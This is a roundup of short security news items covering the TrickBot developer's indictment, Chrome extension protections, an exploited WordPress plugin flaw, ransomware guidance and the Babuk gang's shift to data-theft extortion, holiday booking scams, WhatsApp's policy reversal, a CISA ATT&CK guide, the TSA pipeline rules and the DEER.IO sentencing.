Category: Security

US authorities charged Alla Witte for helping build TrickBot, a type of malware that was active for many years in a worldwide campaign, defrauding numerous people.

Taking down much of TrickBot was a group effort involving multiple countries and coordination that doesn’t usually happen with similar threats. While all of Trickbot’s infrastructure was eventually primarily dismantled, a few servers are still active in various countries where the law enforcement agencies had no jurisdiction.

“The Trickbot malware was designed to steal the personal and financial information of millions of people around the world, thereby causing extensive financial harm and inflicting significant damage to critical infrastructure within the United States and abroad,” said Acting US Attorney Bridget M. Brennan of the Northern District of Ohio.

According to a CyberScoop report, 55-year old Latvian citizen Alla Witte was arrested in Miami on February 6, 2021. She was just arraigned and charged with 19 counts, including conspiracy to commit computer fraud, aggravated identity theft, conspiracy to commit wire and bank fraud, bank fraud and conspiracy to commit money laundering, among others.

“Defendant ALLA WITTE, aka MAX, was a national of Russia,” says the Department of Defence in the indictment. “During the timeframe of this indictment, WITTE resided in Suriname. WITTE was a Malware Developer for the Trickbot Group, overseeing the creation of code related to the monitoring and tracking of authorized users of the Trickbot malware, the control and deployment of ransomware, obtaining payments from ransomware victims, and developing tools and protocols for the storage of credentials stolen and exfiltrated from victims infected by Trickbot.”

Another 18 people are mentioned in the DOJ report and named co-conspirators or defendants, most of whom are from Russia, although the Trickbot group operated from Russia, Belarus, Ukraine and Suriname.

For now, it’s unclear what role Witte played in the Trickbot structure, but US law enforcement agencies will have to settle with just one arrest in this case, as the other defendants haven’t set foot in the US.

Google announced that it’s strengthening the security of its Chrome browser by extending the functionality of Enhanced Safe Browsing to let users filter out malicious extensions.

One of Google Chrome’s strengths is the ability to install extensions to improve the user experience. Users can also manually install extensions, from outside the official store, expopsing themselves to possible malware. Of course, the protection extends to extensions from the Chrome Web Store.

“Enhanced Safe Browsing will now offer additional protection when you install a new extension from the Chrome Web Store,” says Google. “A dialog will inform you if an extension you’re about to install is not a part of the list of extensions trusted by Enhanced Safe Browsing.”

“Any extensions built by a developer who follows the Chrome Web Store Developer Program Policies, will be considered trusted by Enhanced Safe Browsing. For new developers, it will take at least a few months of respecting these conditions to become trusted,” Google added.

The company is also building a list of extensions trusted by the browser, but not all developers are on this list. Around 25% of all extensions are not trusted, but Google hopes to increase that percentage in the near future.

The new protections added to Google Chrome will extend to regular files as well, with the browser now checking whether a downloaded file could be suspicious. It’s doing so by looking at the file metadata and its download origin. Users can choose to keep the file despite the warning.

These new features have been available in the development version of Google Chrome, but they are now ready to be deployed in Chrome 91, the latest stable iteration.

Security researchers have identified a vulnerability in the Fancy Product Designer plugin for WordPress that attackers are using right now in the wild, allowing them to upload malware to websites that use the plugin.

Countless malware campaigns use vulnerable websites to distribute compromised files or extract data. One way attackers do this is by taking control of websites that harbor a vulnerability, like the one in the Fancy Product Designer plugin.

The more popular the plugin, the more impact it will have on the online ecosystems, increasing its attractiveness to attackers. According to researchers from Wordfence, more than 17,000 websites use the Fancy Product Designer plugin.

“Fancy Product Designer is a WordPress plugin that offers the ability for customers to upload images and PDF files to be added to products,” said the researchers. “Unfortunately, while the plugin had some checks in place to prevent malicious files from being uploaded, these checks were insufficient and could easily be bypassed, allowing attackers to upload executable PHP files to any site with the plugin installed. This effectively made it possible for any attacker to achieve Remote Code Execution on an impacted site, allowing full site takeover.”

The vulnerability is being exploited right now, which is why the researchers didn’t share too much, except indicators of compromise and a few other details. The plugin developers already released an update that fixes the problem, but it will take a while until enough websites switch to the new version.

From what the researchers found so far, the attacker seems to be targeting e-commerce sites and attempting to extract order information from site databases. The latest information shows that the vulnerability has been used since Jan. 30, 2021, at the least.

Websites using the Fancy Product Designer plugin are urged to upgrade to the latest version as soon as possible. Just disabling the plugin is not sufficient.

The Biden administration is calling on businesses to take measures against a growing ransomware threat across the United States, urging both private and public organizations to raise effective defenses against threat actors.

In an open letter to corporate executives and business leaders, Anne Neuberger, Deputy Assistant to the President and Deputy National Security Advisor for Cyber and Emerging Technology, notes that ransomware incidents have significantly increased in number and size, in America and across the globe.

The letter recalls recent devastating attacks on hospitals, pipelines and banks, noting that “the threats are serious and they are increasing.”

It also notes that the private sector “has a critical responsibility to protect against these threats,” and that “companies that view ransomware as a threat to their core business operations rather than a simple risk of data theft will react and recover more effectively.”

“To understand your risk, business executives should immediately convene their leadership teams to discuss the ransomware threat and review corporate security posture and business continuity plans to ensure you have the ability to continue or quickly restore operations,” says Neuberger.

The letter includes the US Government’s guide to rapid progress on driving down risk, including several best practices from the President’s Executive Order issued May 12. Those include:

• Multifactor authentication – because passwords alone are routinely compromised)
• Endpoint Detection &Response – to hunt for malicious activity on a network and block it)
• Encryption – so if data is stolen, it is unusable
• A skilled, empowered security team – to patch rapidly, and share and incorporate threat information in your

“These practices will significantly reduce the risk of a successful cyberattack,” Neuberger writes.

IT administrators are urged to keep offline backups of important data, system images and configurations and regularly test them for signs of compromise.

The White House also instructs US companies to update and patch systems on a regular basis; test incident response plans; employ a pen testing team to check if a sophisticated attack can be stopped; and to segment networks to ensure that, if one network has been compromised, others continue operating.

As countries across the globe ease Covid-19 restrictions for travel, consumers are preparing for a much-anticipated summer vacation. However, as the hospitality sector is off to a steady reboot, it’s not just vacationers who are excited about the prospects of relaxing at a beachside villa.

Fraudsters and scammers are in full attack mode as they prepare this year’s arsenal of fake booking websites and holiday offers to steal personal information and money from holidaymakers looking for last-minute deals and cheap property rentals.

Why identifying fake booking deals can be difficult

After months of strict social distancing and pandemic restrictions, individuals need the relaxation of a week or two at a seaside villa or lounging by the pool. Amid the excitement of an imminent vacation, many consumers overlook red flags, potentially turning a fiesta into an actual nightmare.

Online scammers have been doing their homework since the dawn of the internet, improving old ruses and sharpening their social engineering skills for maximum results.

Seasoned scammers set up fake websites that contain descriptions of idyllic vacation spots. The fraudulent websites often use the names of known companies and holiday providers, and even add legitimate details of the accommodation alongside stolen photographs from official websites. While an initial perusal of the website or platform may not initially raise suspicion for the customer, unbelievably low prices for high-demand destinations should.

As you book your summer vacation, beware of fraudulent emails, phone calls, fake websites and posts on social media advertising special deals and search engines.

Warning signs of fraudulent booking and vacation deals

Before spending hundreds or thousands of dollars on your next stay at a bungalow, townhouse or seaside villa, watch out for fraud attempts by what may appear to be your favorite booking website:

• The property requires payment via wire transfers – only use your credit card to pay for your booking to help make it easier to recover your money
• Too-good-to-be-true prices – before making a decision, check the prices of similar bookings in the area you plan to stay. If the prices are much lower than yours or you are rushed into booking immediately, you should reconsider
• Non-refundable deposit – many fake websites offer some of the lowest prices on the market and ask for a non-refundable deposit paid before your arrival. In reality, the properties do not exist, and customers are left without accommodation or money
• Duplicate deals for the same property exist on multiple websites, some of which provide a different address description or photos – before booking, do a Google search and research the details of the property, matching the images in the ads to those on the official website
• No booking confirmation, bill or contract received
• The property’s availability calendar is not updated after your booking

Facebook announced that WhatsApp won’t limit the app’s functionality for users who don’t accept the company’s proposed policy changes, backtracking on an earlier announcement saying the messaging app would slowly become unusable.

Facebook’s original announcement regarding the WhatsApp policy changes miffed many users. They were told they had to agree to share metadata between WhatsApp and Facebook, or the company would delete their accounts.

Shortly after, Facebook backtracked again, saying the apps will initially show only a notification, then would lose the ability to open the chat functions. The ability to respond to messages or calls directly from notifications would remain for a few more weeks, after which that feature would be removed. The result would be a completely unusable WhatsApp.

Now, Facebook is backtracking once more, saying it will no longer limit WhatsApp usage. The persistent message to accept the new terms and conditions would be the only indication from Facebook.

“No one will have their accounts deleted or lose functionality of WhatsApp on May 15th because of this update,” said the company. “Considering the majority of users who have seen the update have accepted, we’ll continue to display a notification in WhatsApp providing more information about the update and reminding those who haven’t had a chance to do so to review and accept. We currently have no plans for these reminders to become persistent and to limit the functionality of the app.”

Facebook could not enforce the new terms and conditions everywhere. Sharing data from WhatsApp to Facebook is not possible in the European Union, at least not in its current form, and it already has a problem in India, where it pushed the same update.

The Cybersecurity & Infrastructure Security Agency (CISA) has released a set of best practices for mapping threat actor moves based on the MITRE ATT&CK framework. The objective is to encourage a common language in threat actor analysis, showing system administrators how to map adversary behavior through instructions and examples.

CISA created the guide in partnership with the Homeland Security Systems Engineering and Development Institute (HSSEDI), a DHS-owned R&D center operated by MITRE.

The 20-page analysis contains a set of mappings to develop adversary profiles, analyze trends and detect, respond to and mitigate threats.

“An increase in the number of organizations integrating the ATT&CK framework in their analysis will have a positive impact on the efficiency and efficacy of information sharing within the community,” CISA notes.

Acting as a lens for IT reps to identify and analyze adversary behavior, ATT&CK provides details on over 100 known threat actor groups and the techniques and malware they use to conduct their campaigns. The framework can be used to “identify defensive gaps, assess security tool capabilities, organize detections, hunt for threats, engage in red team activities, or validate mitigation controls,” CISA explains.

The document outlines various attack levels, referred to in the infosec industry as TTPs (Tactics, Techniques and Procedures), and encourages analysts to use the interactive ATT&CK Navigator tool to highlight specific tactics and techniques and gain a visual perspective of the adversary’s moves.

Using the resource, analysts can even map raw data that may contain artifacts of adversarial behaviors, including shell commands, malware analysis results, artifacts retrieved from forensic disk images, packet captures, and Windows event logs.

A generous portion of the write-up is dedicated to Trickbot, the infamous Trojan-turned-Swiss-army-knife malware that threat actors use to conduct a myriad of illicit cyber activities.

Finally, the document includes a hefty list of mitigations that network defenders can use to strengthen the security posture of their organizations’ systems.

CISA’s alert on Technical Approaches to Uncovering and Remediating Malicious Activity offers extra information on addressing potential incidents and applying best practice incident response procedures.

TSA’s new directive mandating pipeline operators take cybersecurity seriously is being met with skepticism by experts. That includes rumors of a $7,000 penalty for each day that a breach goes unreported.

Last week, the US Department of Homeland Security’s Transportation Security Administration announced a directive to “better identify, protect against, and respond to threats to critical companies in the pipeline sector.”

The directive mandates that critical pipelines report cybersecurity incidents, including potential incidents, to the Cybersecurity and Infrastructure Security Agency (CISA). Operators must also now have a Cybersecurity Coordinator on hand and report incidents to the CISA.

More recent reports say pipeline operators who fail to comply with the new requirements stand to incur penalties, even though the directive doesn’t mention fines explicitly. Officials who asked to remain unidentified told Bloomberg that “the directive will impose fines on pipeline companies that fail to report incidents within 12 hours.”

“This is the first time there’s mandatory reporting of cybersecurity incidents,” according to one of the officials who spoke to journalists ahead of the directive’s unveiling.

A CSO report even mentions actual numbers:

“Although not appearing anywhere in the directive, pipeline companies that fail to meet the security requirements would be subject to financial fines, starting at $7,000 per day,” the report notes, back-linking to the same Bloomberg piece. It is worth noting that Bloomberg’s sources didn’t mention actual numbers.

Oil and gas companies reportedly met the directive with skepticism, with many calling the move rushed out to show that steps are being taken in the wake of the Colonial Pipeline ransomware attack.

Former Justice Department and Navy Department lawyer Robert Cattanach tells CSO that imposing strict fines means going through lengthy rulemaking proceedings.

“That’s a years-long process. There’s no way they could actually impose fines without going to comment,” Cattanach said.

In the early days of ransomware things were fairly simple: malware would infect your company’s infrastructure, encrypting your valuable data with a secret key that was only known to your attackers.

If you had shown the foresight of making secure backups in advance, you could get back up and running again. But if you had no backups, your only chance of getting your data back was if you were prepared to pay a ransom to the gang hell bent on extorting a sometimes hefty cryptocurrency from you.

But in recent years there have been more and more ransomware attacks which have been combined with the exfiltration of data, prior to its encryption. If criminal hackers have a copy of your data you don’t have the “get-out-of-jail-free” card of a secure backup to play. Because your extortionists can also threaten to publish your data online regardless of whether you have successfully recovered your systems, potentially damaging your brand and relationships with customers and business partners.

In April, as reported by Bleeping Computer, the Babuk ransomware gang announced that it was stepping back from encrypting victims’ data.

Although normally such news would be welcomed, in this case the Babuk gang announced that they were not ceasing their criminal activities entirely – but instead were planning to concentrate on data-theft extortion instead.

In a post on its then active website on the dark web, the Babuk group announced its plans in rather broken English:

I not so long ago wrote about the closure of babuk, yes, you all correctly understood babuk as a partensky program will be closed, but it will live in its new understanding, we are a promoted brand with the best pentesters of dark net We are a young project and everyone already knows about us, during this time we have gone gone ahead of other groups, we respect other groups but not all, for example, we express our loyalty to DopplePaymer, Ragnar. Babuk changes direction, we no longer encrypt information on networks, we will get to you and take your data, we will notify you about it if you do not get in touch we make an announcement. Also for other groups that do not have their own blog or have but they want to exert additional pressure, you can not be placed with us.

A later post by Babuk explained that it was moving forward with its plans to create “something really cool”:

Hello! We announce the development of something really cool, a huge platform for independent leaks, we have no rules and bosses, we will publish private products in a single information platform where we will post leaks of successful no-name teams that do not have their own blogs and names, these are not girls who run with ship like rats and change the policy of their resources. these are really strong guys.

Sadly it appears that Babuk have kept their word, and how now launched a new dark web website called “Payload Bin” – seemingly designed to share information from companies who have had their data hacked but have refused to pay up a ransom.

To launch their new website, the source code from a hacked video game manufacturer was put up for auction on the Payload Bin website.

One potential reason why this particular ransomware gang may prefer to steal copies of data from their victims is that they are worried about the massive disruption which can occur if systems are locked up through encryption – and whether that could lead to a bigger punishment if the culprits are ever identified.

Furthermore, things may get complicated for ransomware-as-a-service (RAAS) operations where there may be more than one criminal gang thinking of targeting the same organisation. If companies believe it’s pointless paying a ransom because they will just get hit again one week later, that doesn’t bode well for earnings of the criminal side of the ransomware industry in the long run.

Whatever the reasoning, it’s not necessarily the case that data-theft extortion will automatically yield larger rewards for cybercriminals, especially when you consider how awkward and time-consuming it might be to steal a vast amount of data from a hacked organisation.

Russian citizen Kirill Victorovich Firsov will serve 30 months in prison for administrating an underground website that fueled the cybercriminal community for nearly seven years.

According to a press release, the defunct platform DEER.IO hosted around 3,000 shops that sold stolen credit card information, phone numbers, Social Security numbers, and services.

The DOJ claimed this illegal operation drove profits exceeding $17 million since October 2013, with a turnover of at least $1.2 million from victims in the US.

The US Attorney’s Office of the Southern District of California said the accused was aware that his platform was peddling stolen and counterfeit accounts, including several icons for US-based companies.

“Anyone setting up a store on DEER.IO could click on to then sell stolen accounts from those U.S. companies,” the DOJ said. “Also, DEER.IO was easily searchable, so anyone –including Firsov– could search the platform for stolen U.S. accounts and information.”

On top of stolen gamer accounts sold on the platform, addresses, telephone numbers and other personally identifiable information of American citizens were available for purchase. FBI field agents arrested Firsov in New York after flying in from Moscow on March 7, 2020.

Prior to his arrest, the FBI purchased 1,100 gamer accounts and personal information on more than 3,600 Americans from his platform.

“This platform provided cybercriminals with easy access to the personal accounts and information of people around the world, including Americans,” said Acting US Attorney Randy Grossman. “Stopping that flow of stolen information to criminals is critical to addressing the cybercrime threats facing our country, and we will prosecute those who are responsible.”

The FBI encourages companies and individuals to contact local authorities whenever they suspect or learn they’re victims of cybercrime by notifying field offices or submitting a complaint via the Internet Crime Complaint Center (IC3).